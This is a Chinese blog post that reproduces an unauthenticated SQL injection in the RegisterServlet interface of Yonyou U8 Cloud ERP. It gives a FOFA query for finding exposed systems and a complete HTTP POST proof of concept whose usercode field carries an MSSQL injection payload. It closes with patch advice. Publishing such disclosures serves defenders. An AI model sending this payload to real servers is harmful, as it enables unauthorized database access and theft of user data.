当前位置: 首页 > article >正文

用友U8 Cloud SQL注入漏洞复现

前言

此文章仅用于技术交流,严禁用于对外发起恶意攻击!!!


一、产品简介

用友U8 Cloud是用友推出的新一代云ERP,主要聚焦成长型、创新型企业,提供企业级云ERP整体解决方案

二、漏洞描述

用友U8 Cloud RegisterServlet接口处存在SQL注入漏洞,未授权的攻击者可通过此漏洞获取数据库权限,从而盗取用户
数据,造成用户信息泄露。

三、影响范围

所有版本

四、复现环境

FOFA:app=“用友-U8-Cloud”

五、漏洞复现

1.访问存在漏洞的网站,抓包

在这里插入图片描述

2.POC

POST /servlet/RegisterServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
 
usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123')),3,32)>0--

3.成功查询出123的MD5值
在这里插入图片描述

在这里插入图片描述

六、修复建议

暂时禁止外网访问该系统,及时更新厂商补丁

参考链接

https://blog.csdn.net/qq_41904294/article/details/134818060



http://www.kler.cn/news/159723.html

相关文章:

  • Web(7)内网渗透
  • Matlab进阶绘图第35期—双特征渲染三维散点图
  • 前端:HTML鼠标样式及其对应的CSS属性值
  • win10与 vm虚拟机win7共享文件夹创建
  • 【头歌系统数据库实验】实验5 SQL的多表查询-1
  • Day42| Leetcode 416. 分割等和子集
  • golang 字符串 底层为啥设计为字节数组存储
  • 11.27/28 知识回顾与问题(Django之Web应用与http协议)
  • 【Linux】telnet命令使用
  • scrapy介绍,并创建第一个项目
  • 辐射校正、辐射定标、大气校正关系
  • 递增子序列(回溯)
  • 【EI征稿中#先投稿,先送审#】第三届网络安全、人工智能与数字经济国际学术会议(CSAIDE 2024)
  • 腾讯云轻量对象存储LighthouseCOS详细介绍
  • 如何快速了解在线客服行业的系统?
  • halcon如何设置窗口背景颜色?
  • 7.6 Windows驱动开发:内核监控FileObject文件回调
  • Linux服务器配置指南:网络、用户管理、共享服务及DNS配置详解
  • 虚拟线程原理及性能分析
  • EPICS Base 和许多未捆绑的 EPICS 扩展和支持模块
  • MongoInvalidArgumentError: Argument “docs“ must be an array of documents
  • MySQL 5.7安装-windows11
  • 单实例应用程序
  • 论文阅读:Distributed Initialization for VIRO with Position-Unknown UWB Network
  • Java利用TCP实现简单的双人聊天
  • openssl+EVP详解
  • 数据库增删改查(CRUD)进阶版
  • 安防视频监控/视频融合/云存储EasyCVR页面数据显示不全该如何解决?
  • 【Hive】——数据仓库
  • Linux服务器超级实用的脚本